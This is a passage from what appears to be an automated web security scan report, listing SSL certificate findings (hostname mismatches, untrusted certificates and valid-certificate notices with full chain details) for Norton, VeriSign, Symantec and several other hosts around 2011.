next
Summary
Severity:
Medium
Confidence:
Certain
Host:
https://onlinefamily.norton.com
Path:
/
Issue detail
The following problem was identified with the server's SSL certificate:The server's certificate is not valid for the server's hostname. The server presented the following certificates:Server certificate Issued to: www.onlinefamily.norton.com Issued by: www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign Valid from: Tue Oct 05 18:00:00 GMT-06:00 2010 Valid to: Thu Oct 06 17:59:59 GMT-06:00 2011
Certificate chain #1 Issued to: www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign Issued by: Class 3 Public Primary Certification Authority Valid from: Wed Apr 16 18:00:00 GMT-06:00 1997 Valid to: Mon Oct 24 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.6. https://query.verisign.com/
previous
next
Summary
Severity:
Medium
Confidence:
Certain
Host:
https://query.verisign.com
Path:
/
Issue detail
The following problems were identified with the server's SSL certificate:The server's certificate is not valid for the server's hostname. The server's certificate is not trusted. The server presented the following certificates:Server certificate Issued to: query-ncsa.verisign.net Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Sun Feb 13 18:00:00 GMT-06:00 2011 Valid to: Tue Mar 05 17:59:59 GMT-06:00 2013
Certificate chain #1 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #2 Issued to: VeriSign Class 3 Extended Validation SSL CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #3 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Wed Jul 16 17:59:59 GMT-06:00 2036
8.7. https://ssl-certificate-center.verisign.ch/
previous
next
Summary
Severity:
Medium
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.ch
Path:
/
Issue detail
The following problem was identified with the server's SSL certificate:The server's certificate is not valid for the server's hostname. The server presented the following certificates:Server certificate Issued to: ssl-certificate-center-emea.verisign.net Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Mon Jul 05 18:00:00 GMT-06:00 2010 Valid to: Thu Jul 05 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.8. https://ssl-certificate-center.verisign.com/
previous
next
Summary
Severity:
Medium
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.com
Path:
/
Issue detail
The following problem was identified with the server's SSL certificate:The server's certificate is not valid for the server's hostname. The server presented the following certificates:Server certificate Issued to: ssl-certificate-center-ncsa.verisign.net Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Mon Jul 05 18:00:00 GMT-06:00 2010 Valid to: Thu Jul 05 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.9. https://trust-center.verisign.ch/
previous
next
Summary
Severity:
Medium
Confidence:
Certain
Host:
https://trust-center.verisign.ch
Path:
/
Issue detail
The following problem was identified with the server's SSL certificate:The server's certificate is not valid for the server's hostname. The server presented the following certificates:Server certificate Issued to: ssl-certificate-center-emea.verisign.net Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Mon Jul 05 18:00:00 GMT-06:00 2010 Valid to: Thu Jul 05 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.10. https://trust-center.verisign.com/
previous
next
Summary
Severity:
Medium
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/
Issue detail
The following problem was identified with the server's SSL certificate:The server's certificate is not valid for the server's hostname. The server presented the following certificates:Server certificate Issued to: ssl-certificate-center-ncsa.verisign.net Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Mon Jul 05 18:00:00 GMT-06:00 2010 Valid to: Thu Jul 05 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.11. https://us.norton.com/
previous
next
Summary
Severity:
Medium
Confidence:
Certain
Host:
https://us.norton.com
Path:
/
Issue detail
The following problem was identified with the server's SSL certificate:The server's certificate is not valid for the server's hostname. The server presented the following certificates:Server certificate Issued to: www.norton.com Issued by: USERTrust Legacy Secure Server CA Valid from: Thu Jul 07 18:00:00 GMT-06:00 2011 Valid to: Sat May 19 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: USERTrust Legacy Secure Server CA Issued by: Entrust.net Secure Server Certification Authority Valid from: Thu Nov 26 14:33:13 GMT-06:00 2009 Valid to: Sat Oct 31 22:00:00 GMT-06:00 2015
Certificate chain #2 Issued to: Entrust.net Secure Server Certification Authority Issued by: Entrust.net Secure Server Certification Authority Valid from: Tue May 25 10:09:40 GMT-06:00 1999 Valid to: Sat May 25 10:39:40 GMT-06:00 2019
8.12. https://admin.instantservice.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://admin.instantservice.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: *.instantservice.com Issued by: VeriSign Class 3 Secure Server CA - G3 Valid from: Wed Jul 06 18:00:00 GMT-06:00 2011 Valid to: Fri Jul 06 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Secure Server CA - G3 Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Sun Feb 07 18:00:00 GMT-06:00 2010 Valid to: Fri Feb 07 17:59:59 GMT-06:00 2020
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.13. https://buy-static.norton.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://buy-static.norton.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: buy-static.norton.com Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Mon Jul 11 18:00:00 GMT-06:00 2011 Valid to: Sat Jul 28 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.14. https://cdn.verisign.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: cdn.verisign.com Issued by: www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign Valid from: Sun Apr 18 18:00:00 GMT-06:00 2010 Valid to: Fri Apr 18 17:59:59 GMT-06:00 2014
Certificate chain #1 Issued to: www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign Issued by: Class 3 Public Primary Certification Authority Valid from: Wed Apr 16 18:00:00 GMT-06:00 1997 Valid to: Mon Oct 24 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.15. https://cert.webtrust.org/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cert.webtrust.org
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: cert.webtrust.org Issued by: www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign Valid from: Wed Oct 21 18:00:00 GMT-06:00 2009 Valid to: Sun Oct 21 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign Issued by: Class 3 Public Primary Certification Authority Valid from: Wed Apr 16 18:00:00 GMT-06:00 1997 Valid to: Mon Oct 24 17:59:59 GMT-06:00 2011
Certificate chain #2 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.16. https://donate.mozilla.org/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://donate.mozilla.org
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: donate.mozilla.org Issued by: UTN-USERFirst-Hardware Valid from: Mon Sep 20 18:00:00 GMT-06:00 2010 Valid to: Wed Sep 21 17:59:59 GMT-06:00 2011
Certificate chain #1 Issued to: UTN-USERFirst-Hardware Issued by: UTN-USERFirst-Hardware Valid from: Fri Jul 09 12:10:42 GMT-06:00 1999 Valid to: Tue Jul 09 12:19:22 GMT-06:00 2019
8.17. https://drh.img.digitalriver.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://drh.img.digitalriver.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: *.img.digitalriver.com,ST=Minnesota Issued by: Akamai Subordinate CA 3 Valid from: Thu Feb 03 08:22:35 GMT-06:00 2011 Valid to: Fri Feb 03 08:22:35 GMT-06:00 2012
Certificate chain #1 Issued to: Akamai Subordinate CA 3 Issued by: GTE CyberTrust Global Root Valid from: Thu May 11 09:32:00 GMT-06:00 2006 Valid to: Sat May 11 17:59:00 GMT-06:00 2013
Certificate chain #2 Issued to: GTE CyberTrust Global Root Issued by: GTE CyberTrust Global Root Valid from: Wed Aug 12 18:29:00 GMT-06:00 1998 Valid to: Mon Aug 13 17:59:00 GMT-06:00 2018
8.18. https://enterprise-ssl-admin.verisign.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://enterprise-ssl-admin.verisign.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: enterprise-ssl-admin.verisign.com Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Thu Oct 22 18:00:00 GMT-06:00 2009 Valid to: Thu Oct 13 17:59:59 GMT-06:00 2011
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Tue Aug 01 17:59:59 GMT-06:00 2028
Certificate chain #4 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.19. https://idprotect.verisign.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idprotect.verisign.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: idprotect.verisign.com Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Wed Mar 24 18:00:00 GMT-06:00 2010 Valid to: Sat Mar 24 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.20. https://partnernet.symantec.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://partnernet.symantec.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: partnernet.symantec.com Issued by: VeriSign Class 3 International Server CA - G3 Valid from: Thu Dec 16 18:00:00 GMT-06:00 2010 Valid to: Sun Jan 08 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 International Server CA - G3 Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Sun Feb 07 18:00:00 GMT-06:00 2010 Valid to: Fri Feb 07 17:59:59 GMT-06:00 2020
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.21. https://policy3.responsys.net/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://policy3.responsys.net
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: *.responsys.net Issued by: Equifax Secure Certificate Authority Valid from: Sun May 16 05:02:14 GMT-06:00 2010 Valid to: Sun Jun 17 14:48:31 GMT-06:00 2012
Certificate chain #1 Issued to: Equifax Secure Certificate Authority Issued by: Equifax Secure Certificate Authority Valid from: Sat Aug 22 10:41:51 GMT-06:00 1998 Valid to: Wed Aug 22 10:41:51 GMT-06:00 2018
8.22. https://press.verisign.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://press.verisign.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: press.verisign.com Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Tue Mar 02 18:00:00 GMT-06:00 2010 Valid to: Fri Mar 02 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.23. https://products.geotrust.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://products.geotrust.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: products.geotrust.com Issued by: GeoTrust Extended Validation SSL CA Valid from: Sat Apr 16 15:58:45 GMT-06:00 2011 Valid to: Sat May 18 12:50:47 GMT-06:00 2013
Certificate chain #1 Issued to: GeoTrust Extended Validation SSL CA Issued by: GeoTrust Primary Certification Authority Valid from: Tue Nov 28 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 28 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: GeoTrust Primary Certification Authority Issued by: Equifax Secure Certificate Authority Valid from: Tue Nov 28 10:08:31 GMT-06:00 2006 Valid to: Tue Aug 21 09:08:31 GMT-06:00 2018
Certificate chain #3 Issued to: Equifax Secure Certificate Authority Issued by: Equifax Secure Certificate Authority Valid from: Sat Aug 22 10:41:51 GMT-06:00 1998 Valid to: Wed Aug 22 10:41:51 GMT-06:00 2018
Certificate chain #4 Issued to: Equifax Secure Certificate Authority Issued by: Equifax Secure Certificate Authority Valid from: Sat Aug 22 10:41:51 GMT-06:00 1998 Valid to: Wed Aug 22 10:41:51 GMT-06:00 2018
8.24. https://products.verisign.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://products.verisign.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: products.verisign.com Issued by: VeriSign Class 3 Extended Validation SSL CA Valid from: Wed Nov 18 18:00:00 GMT-06:00 2009 Valid to: Wed Nov 30 17:59:59 GMT-06:00 2011
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Tue Aug 01 17:59:59 GMT-06:00 2028
Certificate chain #4 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.25. https://renewals.symantec.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: renewals.symantec.com Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Mon Apr 25 18:00:00 GMT-06:00 2011 Valid to: Wed Apr 25 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Tue Aug 01 17:59:59 GMT-06:00 2028
Certificate chain #4 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.26. https://seal.verisign.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://seal.verisign.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: seal.verisign.com Issued by: VeriSign Class 3 Secure Server CA - G2 Valid from: Tue Jul 06 18:00:00 GMT-06:00 2010 Valid to: Sun Jul 06 17:59:59 GMT-06:00 2014
Certificate chain #1 Issued to: VeriSign Class 3 Secure Server CA - G2 Issued by: VeriSign Trust Network Valid from: Tue Mar 24 18:00:00 GMT-06:00 2009 Valid to: Sun Mar 24 17:59:59 GMT-06:00 2019
Certificate chain #2 Issued to: VeriSign Trust Network Issued by: VeriSign Trust Network Valid from: Sun May 17 18:00:00 GMT-06:00 1998 Valid to: Tue Aug 01 17:59:59 GMT-06:00 2028
Certificate chain #3 Issued to: VeriSign Trust Network Issued by: VeriSign Trust Network Valid from: Sun May 17 18:00:00 GMT-06:00 1998 Valid to: Tue Aug 01 17:59:59 GMT-06:00 2028
8.27. https://securitycenter.verisign.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://securitycenter.verisign.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: SECURITYCENTER.VERISIGN.COM Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Mon Dec 27 18:00:00 GMT-06:00 2010 Valid to: Thu Dec 27 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.28. https://symaccount.symantec.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://symaccount.symantec.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: symaccount.symantec.com Issued by: VeriSign Class 3 International Server CA - G3 Valid from: Thu Feb 10 18:00:00 GMT-06:00 2011 Valid to: Thu Mar 01 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 International Server CA - G3 Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Sun Feb 07 18:00:00 GMT-06:00 2010 Valid to: Fri Feb 07 17:59:59 GMT-06:00 2020
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.29. https://symantec-corporation.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://symantec-corporation.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: symantec-corporation.com Issued by: VeriSign Class 3 International Server CA - G3 Valid from: Mon May 16 18:00:00 GMT-06:00 2011 Valid to: Wed May 16 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 International Server CA - G3 Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Sun Feb 07 18:00:00 GMT-06:00 2010 Valid to: Fri Feb 07 17:59:59 GMT-06:00 2020
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.30. https://test-products.verisign.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://test-products.verisign.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: test-products.verisign.com Issued by: VeriSign Class 3 Extended Validation SSL CA Valid from: Sun Nov 07 18:00:00 GMT-06:00 2010 Valid to: Wed Nov 07 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
Certificate chain #4 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.31. https://vipdeveloper.verisign.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://vipdeveloper.verisign.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: vipdeveloper.verisign.com Issued by: VeriSign Class 3 Extended Validation SSL CA Valid from: Wed Mar 17 18:00:00 GMT-06:00 2010 Valid to: Sat Mar 17 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
